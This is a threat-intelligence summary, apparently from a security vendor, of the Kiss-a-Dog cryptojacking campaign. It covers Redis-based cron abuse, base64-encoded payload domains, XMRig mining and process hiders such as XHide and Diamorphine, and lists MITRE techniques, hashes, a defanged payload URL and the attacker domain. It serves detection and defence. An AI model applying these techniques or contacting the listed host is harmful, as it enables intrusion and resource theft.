Threat Research

Kiss-a-Dog Discovered Utilizing a 20-Year-Old Process Hider

Securonix

Kiss-a-Dog, a cryptojacking campaign, has evolved to broaden its reach from Docker/Kubernetes to Redis-based targets, introducing a 20-year-old open-source process hider and other payloads like Tsunami and XMRig. The variant uses Redis for initial access, downloads payloads via cron, and employs several stealth techniques to disguise mining activities. #Kiss-a-Dog #XHide #XMRig #Tsunami #Diamorphine #libprocesshider #WatchDog

Keypoints

  • Kiss-a-Dog now employs a Redis-based initial access pattern, abusing cron to execute code on compromised nodes.
  • The campaign downloads a first-stage shell script and a second-stage payload (b.sh) from kiss.a-dog.top, encoding the domain in base64 for on-the-fly decoding.
  • The ai.sh script decodes a payload URL and retrieves a tarball (xm.jpg) containing a hidden start script that selects architecture-specific XMRig binaries.
  • The start script launches a process hider (XHide) to conceal the mining process, masquerading as Sendmail.
  • XHide and other open-source hiders (Diamorphine, libprocesshider) are used to evade detection and persist across campaigns.
  • There is evidence of a test confirming XHide’s effectiveness, showing a high-CPU process masquerading as legitimate software.
  • The article highlights a trend of cloud cryptojacking relying on multiple open-source process hiders for redundancy and stealth, with expectations of continued evolution.

MITRE Techniques

  • [T1053.003] Cron – The cron scheduler runs, the database file is read and interpreted as a cron job, resulting in arbitrary code execution. ‘the cron scheduler runs, the database file is read and interpreted as a cron job, resulting in arbitrary code execution.’
  • [T1105] Ingress Tool Transfer – Redis is used to download and execute an initialisation shell script on the compromised node. ‘download and execute an initialisation shell script on the compromised node.’
  • [T1105] Ingress Tool Transfer – The campaign downloads a second stage payload (b.sh) from kiss[.]a-dog[.]top. ‘second stage payload (b.sh), hosted at the kiss[.]a-dog[.]top domain.’
  • [T1059.004] Unix Shell – ai.sh is a small shell script used in the chain. ‘The script begins with a log statement and some variable assignment, including the decoding of the following payload URL.’
  • [T1027] Obfuscated/Compressed Files and Information – The domain is encoded in base64 and decoded on the fly. ‘encoded in base64 and then decoded on the fly when the job executes.’
  • [T1574.002] Hijack Execution Flow – LD_PRELOAD dynamic linker hijacking used to run the process hider code. ‘LD Preload dynamic linker hijacking technique.’
  • [T1014] Rootkit – Diamorphine open source LKM rootkit used to hide a malicious process. ‘Diamorphine, an open source LKM rootkit for Linux kernel versions 2.6 and newer.’
  • [T1036] Masquerading – The malware masquerades as Sendmail, a Linux email transfer agent. ‘masquerading as Sendmail, a Linux email transfer agent.’
  • [T1496] Resource Hijacking – Mining cryptocurrency is performed, indicating cryptomining activity. ‘Mining cryptocurrency is incredibly resource intensive.’

Indicators of Compromise

  • [SHA-256] context – b.sh, ai.sh, start, xm.jpg, hide, hide.c, mining hashes listed in the article. b.sh – 32ef38ddc86061cb9280f884e5a22f333893e153f9bc5cf2159dd0ac4419d86a, ai.sh – e9b64e1e468c943348c2885613100bb20c6d67f14619483c46532bf6323cff17, start – 0f1e5ab87d39835c6c28f242e68f7855a57813ef8e3e07091eee4f4d4f7ef78d
  • [SHA-256] context – xm.jpg – 97c571621824c8473506dcf332f604a8eea1eb7ed71a6a0ce07a551cc42077ff, hide – 3f1e584ca9393a3f635d8a8573e5b7f863df0dc092911de03bffc2d4ab4f8b53, hide.c – b1f5032c0abab0e185b90a5cacaecd6af2d10974ea2a8f9676732413bcff1424, mining – 8f93a7dd12dbd84749cb5cf675cd8371bd732655a8d048f269d8e88e8136e2e3
  • [URL] context – http://kiss[.]a-dog[.]top/b2f628/m/xm.jpg
  • [Domain] context – kiss.a-dog.top

Read more: https://www.cadosecurity.com/kiss-a-dog-discovered-utilizing-a-20-year-old-process-hider/